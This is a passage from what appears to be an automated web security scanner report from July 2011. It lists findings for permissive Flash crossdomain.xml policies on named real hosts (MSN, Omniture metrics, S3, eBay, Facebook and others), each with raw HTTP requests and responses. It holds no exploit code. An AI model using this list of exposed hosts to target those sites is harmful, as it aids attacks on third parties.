GET /crossdomain.xml HTTP/1.0
Host: img3.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Content-Length: 177
Age: 375813
Date: Tue, 19 Jul 2011 12:23:56 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Fri, 29 Jul 2011 04:00:23 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.36. http://img4.catalog.video.msn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://img4.catalog.video.msn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: img4.catalog.video.msn.com

Response

HTTP/1.0 200 OK
Cache-Control: max-age=1209600
Content-Type: text/xml
Accept-Ranges: bytes
ETag: "efb12b8c8413cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Content-Length: 177
Age: 74735
Date: Tue, 19 Jul 2011 12:23:58 GMT
Last-Modified: Thu, 24 Jun 2010 10:03:51 GMT
Expires: Mon, 01 Aug 2011 15:38:23 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"/>
<allow-access-from domain="*" />
</cross-domain-policy>

5.37. http://in.getclicky.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://in.getclicky.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: in.getclicky.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:25:25 GMT
Server: Apache
Last-Modified: Wed, 13 Jul 2011 23:34:25 GMT
ETag: "5e4041-c9-4a7fbdb512240"
Accept-Ranges: bytes
Content-Length: 201
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.38. http://log50.doubleverify.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://log50.doubleverify.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: log50.doubleverify.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Sun, 17 Jan 2010 08:19:04 GMT
Accept-Ranges: bytes
ETag: "0ccdbb4d97ca1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 20:44:45 GMT
Connection: close
Content-Length: 378

...<?xml version="1.0" encoding="utf-8" ?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
<site-control permitted-cross-dom
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

5.39. http://media.fastclick.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://media.fastclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: media.fastclick.net

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 12:24:04 GMT
Server: Apache/2.2.4 (Unix)
P3P: CP="NOI DSP DEVo TAIo COR PSA OUR IND NAV"
Content-Length: 202
Keep-Alive: timeout=5, max=19943
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy
...[SNIP]...

5.40. http://metrics.boston.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.boston.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.boston.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:43:14 GMT
Server: Omniture DC/2.0.0
xserver: www54
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.41. http://metrics.ticketmaster.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.ticketmaster.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.ticketmaster.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:41 GMT
Server: Omniture DC/2.0.0
xserver: www388
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.42. http://metrics.versionone.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://metrics.versionone.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: metrics.versionone.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:22:36 GMT
Server: Omniture DC/2.0.0
xserver: www316
Content-Length: 167
Keep-Alive: timeout=15
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.43. http://now.eloqua.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://now.eloqua.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: now.eloqua.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=0
Content-Type: text/xml
Last-Modified: Tue, 26 May 2009 19:46:00 GMT
Accept-Ranges: bytes
ETag: "04c37983adec91:0"
Server: Microsoft-IIS/7.5
P3P: CP="IDC DSP COR DEVa TAIa OUR BUS PHY ONL UNI COM NAV CNT STA",
Date: Tue, 19 Jul 2011 14:20:43 GMT
Connection: keep-alive
Content-Length: 206

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
   SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-p
...[SNIP]...

5.44. http://pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 20:43:03 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.45. http://pixel.quantserve.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 20 Jul 2011 20:43:03 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 19 Jul 2011 20:43:03 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.46. http://puma.vizu.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 20:44:21 GMT
Server: PWS/1.7.2.3
X-Px: ht iad-agg-n5.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Sun, 24 Jul 2011 23:38:44 GMT
Age: 162337
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

5.47. http://r.turn.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://r.turn.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: r.turn.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV"
Cache-Control: private
Pragma: private
Expires: Tue, 19 Jul 2011 20:43:05 GMT
Content-Type: text/xml;charset=UTF-8
Date: Tue, 19 Jul 2011 20:43:04 GMT
Connection: close

<?xml version="1.0"?><cross-domain-policy> <allow-access-from domain="*"/></cross-domain-policy>

5.48. http://s3.amazonaws.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://s3.amazonaws.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s3.amazonaws.com

Response

HTTP/1.1 200 OK
x-amz-id-2: 8xNjpRAu7Xx/lc8DphWv07o3cZv3vHeaXvqTPrAsacX72TjBxMXQD9zfgIcW9o8Q
x-amz-request-id: 5E5F0DAE9BC0C977
Date: Tue, 19 Jul 2011 18:37:18 GMT
Content-Type: text/xml
Connection: close
Server: AmazonS3

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*" secure="false" /></cross-domain-pol
...[SNIP]...

5.49. http://secure.adnxs.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure.adnxs.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure.adnxs.com

Response

HTTP/1.0 200 OK
Cache-Control: no-store, no-cache, private
Pragma: no-cache
Expires: Sat, 15 Nov 2008 16:00:00 GMT
P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC"
Set-Cookie: sess=1; path=/; expires=Wed, 20-Jul-2011 18:37:05 GMT; domain=.adnxs.com; HttpOnly
Set-Cookie: uuid2=3420415245200633085; path=/; expires=Mon, 17-Oct-2011 18:37:05 GMT; domain=.adnxs.com; HttpOnly
Content-Type: text/xml
Connection: close
Content-Length: 255

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*"/>
...[SNIP]...

5.50. http://segment-pixel.invitemedia.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://segment-pixel.invitemedia.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: segment-pixel.invitemedia.com

Response

HTTP/1.0 200 OK
Server: IM BidManager
Date: Tue, 19 Jul 2011 14:28:35 GMT
Content-Type: text/plain
Content-Length: 81

<cross-domain-policy>
   <allow-access-from domain="*"/>
</cross-domain-policy>

5.51. http://statse.webtrendslive.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://statse.webtrendslive.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: statse.webtrendslive.com

Response

HTTP/1.1 200 OK
Content-Length: 82
Content-Type: text/xml
Last-Modified: Thu, 20 Dec 2007 20:24:48 GMT
Accept-Ranges: bytes
ETag: "ef9fe45d4643c81:906"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:28 GMT
Connection: close

<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

5.52. http://stubhub.tt.omtrdc.net/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://stubhub.tt.omtrdc.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: stubhub.tt.omtrdc.net

Response

HTTP/1.1 200 OK
ETag: W/"201-1310753133000"
Accept-Ranges: bytes
Content-Length: 201
Date: Tue, 19 Jul 2011 18:36:24 GMT
Connection: close
Last-Modified: Fri, 15 Jul 2011 18:05:33 GMT
Server: Test & Target
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>

...[SNIP]...

5.53. http://t.mookie1.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.mookie1.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.mookie1.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:58 GMT
Server: Apache/2.0.52 (Red Hat)
Last-Modified: Wed, 15 Jun 2011 21:26:36 GMT
ETag: "62fc00b-c9-4a5c6cea6fb00"
Accept-Ranges: bytes
Content-Length: 201
Keep-Alive: timeout=15, max=12
Connection: Keep-Alive
Content-Type: text/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

5.54. http://wa.stubhub.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://wa.stubhub.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: wa.stubhub.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 18:36:25 GMT
Server: Omniture DC/2.0.0
xserver: www379
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

5.55. http://www.clickmanage.com/crossdomain.xml  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.clickmanage.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.clickmanage.com

Response

HTTP/1.1 200 OK
Content-Length: 207
Content-Type: text/xml
Last-Modified: Mon, 13 Apr 2009 20:38:54 GMT
Accept-Ranges: bytes
ETag: "5cabdfdc77bcc91:758"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:20:23 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

5.56. http://add.my.yahoo.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://add.my.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: add.my.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 19 Jul 2011 14:29:48 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

5.57. http://api.bing.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.bing.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.bing.com

Response

HTTP/1.0 200 OK
Cache-Control: no-cache
Content-Length: 634
Content-Type: text/xml
Last-Modified: Fri, 01 Oct 2010 21:58:33 GMT
ETag: A06DD1053D1686DFCEF21D90E3BAD7190000027A
P3P: CP="NON UNI COM NAV STA LOC CURa DEVa PSAa PSDa OUR IND", policyref="http://privacy.msn.com/w3c/p3p.xml"
Date: Tue, 19 Jul 2011 14:28:14 GMT
Connection: close
Set-Cookie: _FS=ui=en-US&mkt=en-US; domain=.bing.com; path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-http-request-headers-from domain="*.bing.com" he
...[SNIP]...
<allow-access-from domain="*.bing.com"/>
...[SNIP]...
<allow-access-from domain="blstc.msn.com"/>
...[SNIP]...
<allow-access-from domain="stc.sandblu.msn-int.com"/>
...[SNIP]...

5.58. http://api.choicestream.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.choicestream.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.choicestream.com

Response

HTTP/1.0 200 OK
Server: Apache-Coyote/1.1
X-CS-Request-Id: 3e8c982c-edf3-440f-ac84-7c9c506acd07
P3P: policyref="http://www.choicestream.com/w3c/p3p.xml",CP="NOI DSP COR NID ADMa DEVa PSAo PSDo OUR STP"
Last-Modified: Tue, 19 Jul 2011 18:36:30 GMT
Content-Type: application/xml
Content-Length: 296
Date: Tue, 19 Jul 2011 18:36:30 GMT
Connection: close
Set-Cookie: JSESSIONID=E24BC6DACCEFBC905E29E6A3B7BC7373; Path=/instr
Set-Cookie: __cs_sp=1; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/
Set-Cookie: CSAnywhere=823c0d1c-2cc2-444c-b394-ea0d63b3dc5e; Domain=.choicestream.com; Expires=Wed, 18-Jul-2012 18:36:30 GMT; Path=/

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM
"http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">


<cross-domain-policy>
<site-control permitted-cross-domain-policies="m
...[SNIP]...
<allow-access-from domain="*.choicestream.com" />
...[SNIP]...

5.59. http://b.myspace.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://b.myspace.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: b.myspace.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Tue, 23 Jun 2009 18:35:39 GMT
Accept-Ranges: bytes
ETag: "cf2446831f4c91:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Tue, 19 Jul 2011 14:28:32 GMT
Connection: keep-alive
Content-Length: 365

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*.myspacecdn.com"/>
   <allow-access-from domain="*.myspace.com"/>
   <allow-http-request-headers-from doma
...[SNIP]...

5.60. http://cdn.stumble-upon.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cdn.stumble-upon.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cdn.stumble-upon.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 31 May 2011 21:14:03 GMT
Content-Type: application/xml
Content-Length: 460
Date: Tue, 19 Jul 2011 14:28:26 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">

<cross-domain-policy>
   <allow-access-from domain="www.stumbleupon.com" />
   <allow-access-from domain="*.stumble.net" />
   <allow-access-from domain="stumble.net" />
   <allow-access-from domain="*.stumbleupon.com" />
   <allow-access-from domain="stumbleupon.com" />
...[SNIP]...

5.61. http://cgi.ebay.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cgi.ebay.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cgi.ebay.com

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
last-modified: Wed, 27 Oct 2010 13:21:58 GMT
Content-Type: application/xml
Content-Length: 3890
Date: Tue, 19 Jul 2011 18:36:23 GMT
Connection: keep-alive

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*.ebay.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.au" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.at" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.be" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ca" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.cn" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.fr" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.de" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.hk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.in" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ie" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.it" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.com.my" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.nz" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ph" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.pl" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.sg" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.es" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ch" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.co.uk" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebayrtm.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebaystatic.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.verve8media.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.westernfreight.com" secure="false"/>
...[SNIP]...
<allow-access-from domain="*.ebay.ru" secure="false"/>
...[SNIP]...

5.62. http://developers.facebook.com/crossdomain.xml  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://developers.facebook.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, allows access from specific other domains, and allows access from specific subdomains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: developers.facebook.com

Response

HTTP/1.0 200 OK
Content-Type: text/x-cross-domain-policy;charset=utf-8
X-FB-Server: 10.32.160.103
Connection: close
Content-Length: 1527

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only" /
...[SNIP]...
<allow-access-from domain="s-static.facebook.com" />
   <allow-access-from domain="static.facebook.com" />
   <allow-access-from domain="static.api.ak.facebook.com" />
   <allow-access-from domain="*.static.ak.facebook.com" />
   <allow-access-from domain="s-static.thefacebook.com" />
   <allow-access-from domain="static.thefacebook.com" />
   <allow-access-from domain="static.api.ak.thefacebook.com" />
